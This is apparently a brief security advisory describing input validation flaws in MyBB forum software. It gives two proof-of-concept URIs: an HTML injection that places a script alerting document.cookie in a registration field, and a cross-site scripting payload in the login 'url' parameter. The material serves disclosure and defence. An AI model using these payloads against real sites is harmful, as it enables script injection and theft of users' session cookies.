|
MyBB Multiple Input Validation Vulnerabilities
This issue can be exploited via a web client. The following proof-of-concept URIs are available: HTML injection: http://www.example.com/mybb/member.php?username=blab&password=blabblab &password2=blabblab &email=blab@blab.com&&email2=blab@blab.com&imagestring=[fill here if needed]&imagehash=[fill here if needed]&action=do_register&yahoo=%3C script%3E alert(document.cookie)%3C/script %3E®submit=register me mybb:D Cross-site scripting: http://www.example.com/mybb/member.php?action=do_login&username=imei&password=doyouneedmine&url=â?><script>alert(1)</script><!â?? |
|
|
Privacy Statement |
